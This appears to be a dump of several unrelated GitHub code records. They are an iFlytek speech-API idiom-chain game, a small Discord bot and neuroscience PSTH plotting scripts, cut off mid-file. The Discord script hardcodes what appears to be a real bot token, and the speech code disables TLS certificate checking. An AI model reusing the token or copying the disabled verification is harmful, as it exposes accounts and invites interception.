algorithm=\\\"%s\\\", headers=\\\"%s\\\", signature=\\\"%s\\\"\" % (\r\n self.APIKey, \"hmac-sha256\", \"host date request-line\", signature_sha)\r\n authorization = base64.b64encode(authorization_origin.encode('utf-8')).decode(encoding='utf-8')\r\n # 将请求的鉴权参数组合为字典\r\n v = {\r\n \"authorization\": authorization,\r\n \"date\": date,\r\n \"host\": \"ws-api.xfyun.cn\"\r\n }\r\n # 拼接鉴权参数,生成url\r\n url = url + '?' + urlencode(v)\r\n # print(\"date: \",date)\r\n # print(\"v: \",v)\r\n # 此处打印出建立连接时候的url,参考本demo的时候可取消上方打印的注释,比对相同参数时生成的url与自己代码生成的url是否一致\r\n # print('websocket url :', url)\r\n return url\r\n\r\n\r\n# 收到websocket消息的处理\r\ndef on_message(ws, message):\r\n try:\r\n code = json.loads(message)[\"code\"]\r\n sid = json.loads(message)[\"sid\"]\r\n if code != 0:\r\n errMsg = json.loads(message)[\"message\"]\r\n print(\"sid:%s 响应报错:%s 代码为:%s\" % (sid, errMsg, code))\r\n\r\n else:\r\n data = json.loads(message)[\"data\"][\"result\"][\"ws\"]\r\n global result\r\n #result=\"\"\r\n for item in data:\r\n result += item[\"cw\"][0][\"w\"]\r\n\r\n except Exception as e:\r\n print(\"receive msg,but parse exception:\", e)\r\n\r\n return result\r\n\r\n# 收到websocket错误的处理\r\ndef on_error(ws, error):\r\n print(\"### 有错误啊:\", error)\r\n\r\n\r\n# 收到websocket关闭的处理\r\ndef on_close(ws):\r\n print(\"### 欢迎使用讯飞AI ###\")\r\n\r\n\r\n# 收到websocket连接建立的处理\r\ndef on_open(ws):\r\n def run(*args):\r\n frameSize = 8000 # 每一帧的音频大小\r\n intervel = 0.04 # 发送音频间隔(单位:s)\r\n status = STATUS_FIRST_FRAME # 音频的状态信息,标识音频是第一帧,还是中间帧、最后一帧\r\n\r\n with open(wsParam.AudioFile, \"rb\") as fp:\r\n while True:\r\n buf = fp.read(frameSize)\r\n # 文件结束\r\n if not buf:\r\n status = STATUS_LAST_FRAME\r\n # 第一帧处理\r\n # 发送第一帧音频,带business 参数\r\n # appid 必须带上,只需第一帧发送\r\n if status == STATUS_FIRST_FRAME:\r\n\r\n d = {\"common\": wsParam.CommonArgs,\r\n \"business\": wsParam.BusinessArgs,\r\n \"data\": {\"status\": 0, \"format\": \"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n d = json.dumps(d)\r\n ws.send(d)\r\n status = STATUS_CONTINUE_FRAME\r\n # 中间帧处理\r\n elif status == STATUS_CONTINUE_FRAME:\r\n d = {\"data\": {\"status\": 1, \"format\": \"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n ws.send(json.dumps(d))\r\n # 最后一帧处理\r\n elif status == STATUS_LAST_FRAME:\r\n d = {\"data\": {\"status\": 2, \"format\": \"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n ws.send(json.dumps(d))\r\n time.sleep(1)\r\n break\r\n # 模拟音频采样间隔\r\n time.sleep(intervel)\r\n ws.close()\r\n\r\n thread.start_new_thread(run, ())\r\n#读取成语库数据data.txt文件\r\ndef readData(filepath):\r\n fp = open(filepath, 'r', encoding='utf-8')\r\n idiom_data = {}\r\n valid_idioms = {}\r\n for line in fp.readlines():\r\n line = line.strip()\r\n if not line: continue\r\n item = line.split('\\t')\r\n if len(item) != 3: continue\r\n if item[0][0] not in idiom_data:\r\n idiom_data[item[0][0]] = [item]\r\n else:\r\n idiom_data[item[0][0]].append(item)\r\n valid_idioms[item[0]] = item[1:]\r\n return idiom_data, valid_idioms\r\n#播放wav音频文件\r\ndef playwav():\r\n chunk = 1024\r\n wf = wave.open('output.wav', 'rb')\r\n p = pyaudio.PyAudio()\r\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\r\n channels=wf.getnchannels(),\r\n rate=wf.getframerate(),\r\n output=True)\r\n data = wf.readframes(chunk)\r\n while len(data) > 0:\r\n stream.write(data)\r\n data = wf.readframes(chunk)\r\n stream.stop_stream()\r\n stream.close()\r\n p.terminate()\r\n\r\n#将pcm加入头文件组成完整的wav音频文件\r\ndef pcm2wav(pcm_file, save_file, channels=1, bits=16, sample_rate=16000):\r\n pcmf=open(pcm_file, 'rb')\r\n pcmdata = pcmf.read()\r\n pcmf.close()\r\n if bits % 8 != 0:\r\n raise ValueError(\"bits % 8 must == 0. now bits:\" + str(bits))\r\n wavfile=wave.open(save_file, 'wb')\r\n wavfile.setnchannels(channels)\r\n wavfile.setsampwidth(bits//8)\r\n wavfile.setframerate(sample_rate)\r\n wavfile.writeframes(pcmdata)\r\n wavfile.close()\r\n#调用讯飞语音合成API的类\r\nclass Ws_Param2(object):\r\n # 初始化\r\n def __init__(self, APPID, APIKey, APISecret, Text):\r\n self.APPID = APPID\r\n self.APIKey = APIKey\r\n self.APISecret = APISecret\r\n self.Text = Text\r\n\r\n # 公共参数(common)\r\n self.CommonArgs = {\"app_id\": self.APPID}\r\n # 业务参数(business),更多个性化参数可在官网查看\r\n self.BusinessArgs = {\"aue\": \"raw\", \"auf\": \"audio/L16;rate=16000\", \"vcn\": \"x2_nannan\", \"tte\": \"utf8\"}\r\n self.Data = {\"status\": 2, \"text\": str(base64.b64encode(self.Text.encode('utf-8')), \"UTF8\")}\r\n #使用小语种须使用以下方式,此处的unicode指的是 utf16小端的编码方式,即\"UTF-16LE\"”\r\n #self.Data = {\"status\": 2, \"text\": str(base64.b64encode(self.Text.encode('utf-16')), \"UTF8\")}\r\n\r\n \r\n # 生成url\r\n def create_url(self):\r\n url = 'wss://tts-api.xfyun.cn/v2/tts'\r\n # 生成RFC1123格式的时间戳\r\n now = datetime.now()\r\n date = format_date_time(mktime(now.timetuple()))\r\n\r\n # 拼接字符串\r\n signature_origin = \"host: \" + \"ws-api.xfyun.cn\" + \"\\n\"\r\n signature_origin += \"date: \" + date + \"\\n\"\r\n signature_origin += \"GET \" + \"/v2/tts \" + \"HTTP/1.1\"\r\n # 进行hmac-sha256进行加密\r\n signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'),\r\n digestmod=hashlib.sha256).digest()\r\n signature_sha = base64.b64encode(signature_sha).decode(encoding='utf-8')\r\n\r\n authorization_origin = \"api_key=\\\"%s\\\", algorithm=\\\"%s\\\", headers=\\\"%s\\\", signature=\\\"%s\\\"\" % (\r\n self.APIKey, \"hmac-sha256\", \"host date request-line\", signature_sha)\r\n authorization = base64.b64encode(authorization_origin.encode('utf-8')).decode(encoding='utf-8')\r\n # 将请求的鉴权参数组合为字典\r\n v = {\r\n \"authorization\": authorization,\r\n \"date\": date,\r\n \"host\": \"ws-api.xfyun.cn\"\r\n }\r\n # 拼接鉴权参数,生成url\r\n url = url + '?' + urlencode(v)\r\n # print(\"date: \",date)\r\n # print(\"v: \",v)\r\n # 此处打印出建立连接时候的url,参考本demo的时候可取消上方打印的注释,比对相同参数时生成的url与自己代码生成的url是否一致\r\n # print('websocket url :', url)\r\n return url\r\n\r\ndef on_message2(ws2, message):\r\n try:\r\n message =json.loads(message)\r\n code = message[\"code\"]\r\n sid = message[\"sid\"]\r\n audio = message[\"data\"][\"audio\"]\r\n audio = base64.b64decode(audio)\r\n status = message[\"data\"][\"status\"]\r\n #print(message)\r\n if status == 2:\r\n print(\"结束讯飞AI调用\")\r\n ws2.close()\r\n if code != 0:\r\n errMsg = message[\"message\"]\r\n print(\"sid:%s call error:%s code is:%s\" % (sid, errMsg, code))\r\n else:\r\n\r\n with open('output.pcm', 'ab') as f:\r\n f.write(audio)\r\n pcm2wav(\"output.pcm\",\"output.wav\")\r\n except Exception as e:\r\n print(\"receive msg,but parse exception:\", e)\r\n\r\n\r\n\r\n# 收到websocket错误的处理\r\ndef on_error2(ws2, error):\r\n print(\"### error:\", error)\r\n\r\n\r\n# 收到websocket关闭的处理\r\ndef on_close2(ws2):\r\n print(\"### closed ###\")\r\n\r\n\r\n\r\n# 收到websocket连接建立的处理\r\ndef on_open2(ws2):\r\n def run(*args):\r\n d = {\"common\": wsParam2.CommonArgs,\r\n \"business\": wsParam2.BusinessArgs,\r\n \"data\": wsParam2.Data,\r\n }\r\n d = json.dumps(d)\r\n #print(\"------>开始发送文本数据\")\r\n ws2.send(d)\r\n if os.path.exists('output.pcm'):\r\n os.remove('output.pcm')\r\n \r\n\r\n thread.start_new_thread(run, ())\r\n\r\n\r\n\r\nif __name__ == \"__main__\": \r\n #engine = pyttsx3.init()\r\n while 1:\r\n idiom_data,valid_idioms = readData('data.txt')\r\n ai_answer = None\r\n get_audio(in_path)\r\n wsParam = Ws_Param(APPID='', APIKey='',\r\n APISecret='',\r\n AudioFile=r'input.wav')\r\n websocket.enableTrace(False)\r\n wsUrl = wsParam.create_url()\r\n result=\"\"\r\n ws = websocket.WebSocketApp(wsUrl, on_message=on_message, on_error=on_error, on_close=on_close)\r\n ws.on_open = on_open\r\n ws.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\r\n print(\"识别到:\",result)\r\n idiom=result\r\n idiom = idiom.strip()\r\n try:\r\n answers = idiom_data[idiom[-1]]\r\n answer = random.choice(answers)\r\n ai_answer = answer.copy()\r\n wsParam2 = Ws_Param2(APPID='', APIKey='',\r\n APISecret='',\r\n Text=\"我接:\"+ai_answer[0])\r\n print(\"我接:\",ai_answer[0])\r\n except Exception as e:\r\n wsParam2 = Ws_Param2(APPID='', APIKey='',\r\n APISecret='',\r\n Text=\"你说的是神马成语!不会接\")\r\n websocket.enableTrace(False)\r\n wsUrl2 = wsParam2.create_url()\r\n ws2 = websocket.WebSocketApp(wsUrl2, on_message=on_message2, on_error=on_error2, on_close=on_close2)\r\n ws2.on_open = on_open2\r\n ws2.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\r\n playwav()\r\n #print(\"我的回答是:\",ai_answer[0])\r\n #engine.say(ai_answer[0])\r\n #engine.runAndWait()\r\n\r\n \r\n" } ]
1
sidhubotdev/bot
https://github.com/sidhubotdev/bot
aacaedd378e563bfb7781c3f234567def2bf9baa
7bda59f2566da4fa098809db3efcf503641ee4c1
ee6bf888fb99cfce4a16fe5127d74bf02ce5c90a
refs/heads/master
2023-04-07T11:57:26.347342
2021-04-13T11:01:05
2021-04-13T11:01:05
357,508,461
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.727554202079773, "alphanum_fraction": 0.7492260336875916, "avg_line_length": 22, "blob_id": "031c58d6709786cf933b6eb56495d14bb545111a", "content_id": "7172e4b9acc825192d47aba66ccc661df74b3661", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 323, "license_type": "no_license", "max_line_length": 73, "num_lines": 14, "path": "/main.py", "repo_name": "sidhubotdev/bot", "src_encoding": "UTF-8", "text": "from discord.ext import commands\nfrom discord.ext.commands import Bot\n\nclient: Bot = commands.Bot(command_prefix=\"&\")\n\[email protected]\nasync def on_ready():\n print(\"bot is ready\")\n\[email protected]()\nasync def hello(ctx):\n await ctx.send(\"HI\")\n\nclient.run(\"ODMwMzMxMDMyODA4MzI1MTYw.YHFICQ.KKslb8D3r4bvtYWOSNI01RiHctk\")\n\n" } ]
1
bjmedina/PSTH
https://github.com/bjmedina/PSTH
f4a100c77d05d53649073d8e6b786aeefa558c02
e4d19b742809cfa8f6e9ce524cb6c80701e69fba
3c4949c3daa6b53bac30da193beccddef4b1adb9
refs/heads/master
2020-06-04T09:38:18.994692
2019-10-10T02:03:29
2019-10-10T02:03:29
191,970,378
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5129870176315308, "alphanum_fraction": 0.6298701167106628, "avg_line_length": 14.399999618530273, "blob_id": "93e9677103bc519e231c79df3e2975e53b885c4b", "content_id": "521fe71dbf0b152b017c9edb335383d40fb8a8f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 42, "num_lines": 10, "path": "/nwb_plots.py~", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 20 12:48:05 2018\n\n@author: Bryan Medina \n\n(c) 2019 Allen Institute for Brain Science\n\n\"\"\"\n" }, { "alpha_fraction": 0.5220656991004944, "alphanum_fraction": 0.5514084696769714, "avg_line_length": 30.776119232177734, "blob_id": "87d6324c5e83e54a967d2ebe6436b2a8d33323a6", "content_id": "4d57ef6c6e95e525aa04d31a2d73c00bcf556846", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4260, "license_type": "no_license", "max_line_length": 124, "num_lines": 134, "path": "/nwb_plots_firing_rates.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 1 11:50:02 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\n###### Imports ########\nfrom nwb_plots_functions import *\n########################\n\n###### UPDATE PATH #################################\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data'\nVAR_DIREC = '/Users/bjm/Documents/CMU/Research/data/plots/variations/'\nMICE_ID = ['424448', '421338', '405751']\nMOUSE_ID = '421338'\n\n####################################################\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobe_names = nwb['processing']\n\n# keeps track of max firing rate for each cell in \nprobe_fr = {}\n\ncolors = {'424448':'red',\n '421338':'green',\n '405751':'blue'}\n\n# firing rate filename\nfilename = MOUSE_ID + '_probes_fr'\nPLOT_ALL = True\n\nrows = 2\ncols = 2\n\n# Ideally, you should do this for every mouse.\n\n# We want to check to see if we have this data\ntry:\n with open(filename+\"_\", 'rb') as f:\n probe_fr = pickle.load(f)\n \nexcept:\n # only keep track of maximal firing rates...\n probe_fr = {}\n \n for probe_name in probe_names:\n # Getting all data for a given cell\n # File to get data from.\n probe_filename = MOUSE_ID + \"_\" + probe_name\n print(probe_filename)\n \n try:\n with open(probe_filename, 'rb') as f:\n # Plotting all curves for every region for a given mouse.\n probe = pickle.load(f)\n \n except FileNotFoundError:\n saveProbeData(MOUSE_ID, probe_name, nwb)\n print(\"Run again nwb_plots with plotting off\")\n sys.exit(1)\n \n probe_fr[probe_name] = []\n \n for cell in probe.getCellList():\n # Get max, add it here...\n probe_fr[probe_name].append(probe.getCell(cell).max_frate)\n\n# Plot everything\nfor probe_name in probe_names:\n # Plot variability of every region\n if(PLOT_ALL):\n # Plotting how variable neuron can be\n for probe_name in probe_names:\n\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" / \" + probe_name + \" Variation\")\n plt.ylim(0, 14)\n plt.xlabel(\"Maximal Firing Rate (Spikes/Sec)\")\n plt.ylabel(\"Number of Neurons\")\n plt.hist(probe_fr[probe_name], bins = 100, edgecolor='black')\n plt.savefig(VAR_DIREC + MOUSE_ID + probe_name + \"_variations.png\")\n plt.clf()\n\n\n# Plotting multiple summary plots in one plot.\nfig, axes = plt.subplots(nrows=2, ncols=2, figsize=(8,8))\nfig.suptitle(\"Variation in Maximal Firing Rates\")\nfig.text(0.5, 0.04, 'Maximal Firing Rate (Spikes/sec)', ha='center')\nfig.text(0.04, 0.5, 'Number of Neurons', va='center', rotation='vertical')\n\nvariability = []\ncurves = {}\ni = 0\n\n# Plotting 4 plots in one figure.\nfor row in range(0, rows):\n for col in range(0, cols):\n\n if( not (row + 1 == rows and col + 1 == cols) ):\n MOUSE = MICE_ID[i]\n filename = MOUSE + '_probes_fr'\n \n with open(filename, 'rb') as f:\n probe_fr = pickle.load(f)\n \n for probe_name in probe_names:\n variability.extend(probe_fr[probe_name])\n \n axes[row, col].set_ylim([0, 90])\n axes[row, col].set_xlim([0, 100])\n axes[row, col].set_title(\"Mouse %s\" % (MOUSE))\n ys, bins, c = axes[row, col].hist(variability, bins = 100,color=colors[MOUSE], edgecolor='black', alpha=0.7) \n curves[MOUSE] = [LSQUnivariateSpline(bins[0:len(bins)-1], ys, [10, 30, 55, 70, 100]), bins[0:len(bins)-1]]\n i = i+1\n variability = []\n\n else:\n axes[row, col].set_ylim([0, 90])\n axes[row, col].set_xlim([0, 100])\n axes[row, col].set_title(\"All Variations\")\n\n for ID in MICE_ID:\n axes[row, col].plot(curves[ID][1], curves[ID][0](curves[ID][1]), label=ID, color=colors[ID], alpha=0.7)\n axes[row, col].legend()\n\nplt.savefig(VAR_DIREC + \"firing_rate_variations.png\")\n\n# Save the probe_fr file.\nwith open(filename, 'wb') as f:\n pickle.dump(probe_fr, f)\n\n\n" }, { "alpha_fraction": 0.569037675857544, "alphanum_fraction": 0.6150627732276917, "avg_line_length": 19.782608032226562, "blob_id": "35c180e99f5472830120ca9cd901ca7cc9ce05ff", "content_id": "8d094256deb105a7760acfa80e859fdb5d0b1e9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 478, "license_type": "no_license", "max_line_length": 52, "num_lines": 23, "path": "/nwb_plots_firing_rates.py~", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\n###### Imports ########\nfrom nwb_plots_functions import *\nfrom scipy.interpolate import LSQUnivariateSpline\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport sys\n########################\n\n###### UPDATE PATH #################################\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data'\n\nMOUSE_ID = '424448'\n" }, { "alpha_fraction": 0.644059419631958, "alphanum_fraction": 0.656930685043335, "avg_line_length": 39.400001525878906, "blob_id": "536f36827c7296db3f346a3f9d77f0fd769feb08", "content_id": "3da174b5e1b86266620d469a54a0cfd667162598", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2020, "license_type": "no_license", "max_line_length": 292, "num_lines": 50, "path": "/README.md", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "# Plots for _Neuropixels_ Data\n---\n\nThese files assume the following hierarchy: \n\n```misc\n~/\n data/ (code and data go here) [in code, put path in DIRECTORY]\n plots/ [in code, put path in SUMMARY_PLOTS_DIRECTORY]\n cells/ (PSTH plots for every cell in every probe) [put path in CELL_PLOTS_DIRECTORY]\n probeA/ [ you just have to make these directories, with those exact names ]\n probeB/\n ...\n probeF/\n percentile/ (Plots for percentiles of every mouse)\n probes/ (PSTH plots averaged across all cells and trials) [put path in PROBE_PLOTS_DIRECTORY]\n variations/ (directories of class names) [in code, put path in VAR_DIREC]\n trial_data/ (data calculated for every trial)\n```\n\n\n## Libraries Needed\n---\n``` library >= version ``` || ``` pip install library ```\n\n```rpy2 >= 3.0.4``` || ```pip install rpy2``` \n\n```numpy >= 1.14.2``` || ```pip install numpy```\n\n```pickle >= 4.0``` || ```pip install pickle```\n\n```h5py >= 2.8.0``` || ```pip install h5py```\n\n```matplotlib >= 3.0.2``` || ```pip install matplotlib```\n\n\n## Steps for Running\n---\n\n1. Make sure you have all the directories and folders set up. Follow the ```[...put path in (VARIABLE_NAME_HERE)]``` comments to help you figure out where to put the paths in the code (Code could be written to automatically create the directories...).\n\n2. Run ```nwb_plots.py```. If everything goes well, the output before the program ends should be ```run again```.\n\n3. Run ```nwb_plots.py``` again. Repeat 2 and 3 for all mice (you can change the mouse you're working on by looking for the variable ```MOUSE_ID``` in the code). You should now see plots in ```SUMMARY_PLOTS_DIRECTORY``` and ```CELL_PLOTS_DIRECTORY```. These two steps should take the longest.\n\n4. Run ```nwb_plots_percentile.py``` for each mouse. These plots will be saved in ```percentile```.\n\n5. Run ```nwb_dropout.py``` for each mouse. These plots will be saved in ```probes```.\n\n__NOTE__: ```VAR_DIREC``` is no longer needed. Neither is ```nwb_trials.py```\n" }, { "alpha_fraction": 0.5574324131011963, "alphanum_fraction": 0.6148648858070374, "avg_line_length": 16.41176414489746, "blob_id": "f1ceb9e36cb823e4b33c08220f4e1b291cd00f65", "content_id": "656599e6fa28608e1da62c916096475d32d7b990", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 51, "num_lines": 17, "path": "/nwb_plots_functions.py~", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina \n\n\"\"\"\n\n###### Imports ########\nfrom scipy.ndimage.filters import gaussian_filter1d\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n########################\n" }, { "alpha_fraction": 0.5260869860649109, "alphanum_fraction": 0.5625603795051575, "avg_line_length": 30.12030029296875, "blob_id": "d41aee05cab0495e56001e944cea25456bb1f1a8", "content_id": "dcde32ddc533a9a43345f6cd9d227bfc81113a4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4140, "license_type": "no_license", "max_line_length": 116, "num_lines": 133, "path": "/nwb_plots_percentile.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 1 11:50:02 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\n###### Imports ########\nfrom nwb_plots_functions import *\nfrom scipy.interpolate import LSQUnivariateSpline\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport sys\n########################\n\n###### UPDATE PATH #################################\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data'\nVAR_DIREC = '/Users/bjm/Documents/CMU/Research/data/plots/variations/'\nPERC_PLOTS_DIRECTORY = '/Users/bjm/Documents/CMU/Research/data/plots/percentile/'\nMOUSE_ID = '424448'\n####################################################\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobes = nwb['processing']\nprobe_names = [name for name in probes.keys()]\n\n# save all curves for all regions\nmid = {}\ntop = {}\nbot = {}\n\n# Used for plotting\nrows = 3\ncols = 2\n\nfor probe_name in probe_names:\n # Calculate median neuron, and also 90th and 10th percentile neuron\n median_n = []\n top_ten = []\n bot_ten = []\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n for xval in xs:\n \n rates = []\n \n for cell in probe.getCellList():\n rates.append(probe.getCell(cell).lsq(xval))\n\n # Sort this list...\n rates.sort()\n \n median_n.append(np.median(rates))\n top_ten.append(np.percentile(rates, 75))\n bot_ten.append(np.percentile(rates, 25))\n \n # save the curves\n mid[probe_name] = LSQUnivariateSpline(xs, median_n, knots[1:-1])\n top[probe_name] = LSQUnivariateSpline(xs, top_ten, knots[1:-1])\n bot[probe_name] = LSQUnivariateSpline(xs, bot_ten, knots)\n\n\n# Plotting median, 75th percentile, and 25th percentile neuron\n\n# Do multiple plots on one figure\nfig, axes = plt.subplots(nrows=3, ncols=2, figsize=(10, 10))\nfig.tight_layout(pad=0.1, w_pad=0.1, h_pad=0.1)\nfig.suptitle(\"Mouse %s Neural Activity\" % (MOUSE_ID))\nfig.text(0.5, 0.04, 'Bins (ms)', ha='center')\nfig.text(0.04, 0.5, 'Firing Rate (Spike/sec)', va='center', rotation='vertical')\ni = 0\n\nfor row in range(0, rows):\n for col in range(0, cols):\n\n probe_name = probe_names[i]\n probe_filename = MOUSE_ID + \"_\" + probe_name\n \n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n\n box = axes[row,col].get_position()\n move = 0.08\n move2 = 0.033\n move3 = 0.053\n\n if(row == 0):\n if(col == 0):\n axes[row,col].set_position([move+box.x0+box.x0/5, box.y0, box.width * 0.8 , box.height * 0.8])\n else:\n axes[row,col].set_position([move+box.x0-box.x0/7, box.y0, box.width * 0.8 , box.height * 0.8])\n elif(row == 1):\n if(col == 0):\n axes[row,col].set_position([move+box.x0+box.x0/5, box.y0+move2, box.width * 0.8 , box.height * 0.8])\n else:\n axes[row,col].set_position([move+box.x0-box.x0/7, box.y0+move2, box.width * 0.8 , box.height * 0.8])\n elif(row == 2):\n if(col == 0):\n axes[row,col].set_position([move+box.x0+box.x0/5, box.y0+move3, box.width * 0.8 , box.height * 0.8])\n else:\n axes[row,col].set_position([move+box.x0-box.x0/7, box.y0+move3, box.width * 0.8 , box.height * 0.8])\n\n \n axes[row, col].set_ylim([0, 13])\n axes[row, col].set_xlim([-20, 500])\n \n axes[row, col].set_title(probe.name)\n \n axes[row, col].plot(xs, top[probe_name](xs), label = \"75th Percentile\")\n \n axes[row, col].plot(xs, mid[probe_name](xs), label = \"Median Neuron\")\n \n axes[row, col].plot(xs, bot[probe_name](xs), label = \"25th Percentile\")\n\n if(row == 0 and col == cols - 1):\n axes[row, col].legend()\n \n # Next probe\n i = i+1\n\nplt.savefig(PERC_PLOTS_DIRECTORY + str(MOUSE_ID) + \"_percentile.png\")\nplt.clf()\n\n" }, { "alpha_fraction": 0.4861716032028198, "alphanum_fraction": 0.5046820640563965, "avg_line_length": 38.92173767089844, "blob_id": "5ce630fc1aa120311ee05a5f48a4b5e9c33ddeb5", "content_id": "80de255be0c7f9abb4f8aea7e4e1109f13458fc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9184, "license_type": "no_license", "max_line_length": 138, "num_lines": 230, "path": "/nwb_plots.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\nfrom nwb_plots_functions import *\n# READ ME ################################\n# This file plots\n# - (1) PSTHs for every cell (averaged across all trials) as well as a smoothed curve\n# - (2) PSTHs for every probe (averaged across all trials and all cells) as well as a smoothed curve\n# - (3) Smoothed curve for every probe\n##########################################\n\n## CHANGE ME #############################################################\n# Data directory\nDIRECTORY = '/home/bjm/Documents/CS/PSTH'\nSUMMARY_PLOTS_DIRECTORY = '/home/bjm/Documents/CS/PSTH/plots/'\nVAR_DIREC = '/home/bjm/Documents/CS/PSTH/plots/variations/'\nMOUSE_ID = '421338'\n##########################################################################\n\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobe_names = nwb['processing']\n\n# Allows plotting (takes more time)\nPLOTTING = True\n\n# Print Descriptions\nDESCRIPTIONS = True\n\n# Turn this on if it's your first time running this code.\nALL_PLOTS = True\n\nif(ALL_PLOTS):\n for probe_name in probe_names:\n # File to get data from.\n probe_filename = MOUSE_ID + \"_\" + probe_name\n print(probe_filename)\n \n # plot directories\n \n ## CHANGE ME ####################################################################################\n PROBE_PLOTS_DIRECTORY = '/home/bjm/Documents/CS/PSTH/plots/probes/'\n CELL_PLOTS_DIRECTORY = '/home/bjm/Documents/CS/PSTH/plots/cells/' + probe_name + '/'\n #################################################################################################\n \n ## Find probe to override\n try:\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n ## If probe file doesn't exist, then we'll have to make that file from scratch \n except FileNotFoundError:\n \n for probe_name in probe_names:\n saveProbeData(MOUSE_ID, probe_name, nwb)\n \n print(\"Run again\")\n sys.exit(1)\n \n # Summary of all activity across all cells in a probe.\n x = np.zeros((len(bins), 1))\n\n # Plotting (1) #####################\n # Getting all data for a given cell\n for cell in probe.getCellList():\n # current cell spiking data\n curr_cell = np.zeros((len(bins), 1))\n for freq in temp_freqs:\n for angle in orientations:\n config = str(freq) + \"_\" + str(angle)\n curr_cell += probe.getCell(cell).getSpikes(config)\n # Plot curr cell\n x += probe.getCell(cell).getSpikes(config)\n \n # Convert cell spiking data to a format 'plt.hist' will like\n z = fromFreqList(curr_cell)\n curr_cell,b,c = plt.hist(z, bins)\n plt.clf()\n \n # Normalize\n curr_cell /= num_trials*0.001\n \n # Get some information on the cell such as max firing rate, avg, std, and name\n ################# Finding peaks and valleys #######################\n probe.getCell(cell).max_frate = max(curr_cell[0:500])\n probe.getCell(cell).max_ftime = np.where(curr_cell[0:500] == probe.getCell(cell).max_frate)[0][0]\n probe.getCell(cell).avg_frate = np.mean(curr_cell[0:500])\n probe.getCell(cell).std = np.std(curr_cell[0:500])\n probe.getCell(cell).name = cell\n \n # Also get the associated firing rate curve for the cell\n lsq = LSQUnivariateSpline(bins[0:len(bins)-1], curr_cell, knots)\n probe.getCell(cell).lsq = lsq\n\n cpm_result = cpm.detectChangePoint(FloatVector(lsq(curr_cell[0:probe.getCell(cell).max_ftime])), cpmType='Student', ARL0=1000)\n cpm_result = robj_to_dict(cpm_result)\n \n probe.getCell(cell).change_pt = lsq(cpm_result['changePoint'][0])\n probe.getCell(cell).chg_time = cpm_result['changePoint'][0]\n ####################################################################\n \n if(DESCRIPTIONS):\n print(\"Cell \" + str(cell) + \" : \" + str(probe.getCell(cell))) \n \n # Plotting\n if(PLOTTING):\n # Plotting normalized cell activity\n cell_filename = MOUSE_ID + \"_cell\" + str(cell)\n plt.axvline(x=probe.getCell(cell).chg_time, alpha=0.5, linestyle='--', color='magenta')\n plt.ylim(0, 75)\n plt.xlim(-20, 520)\n 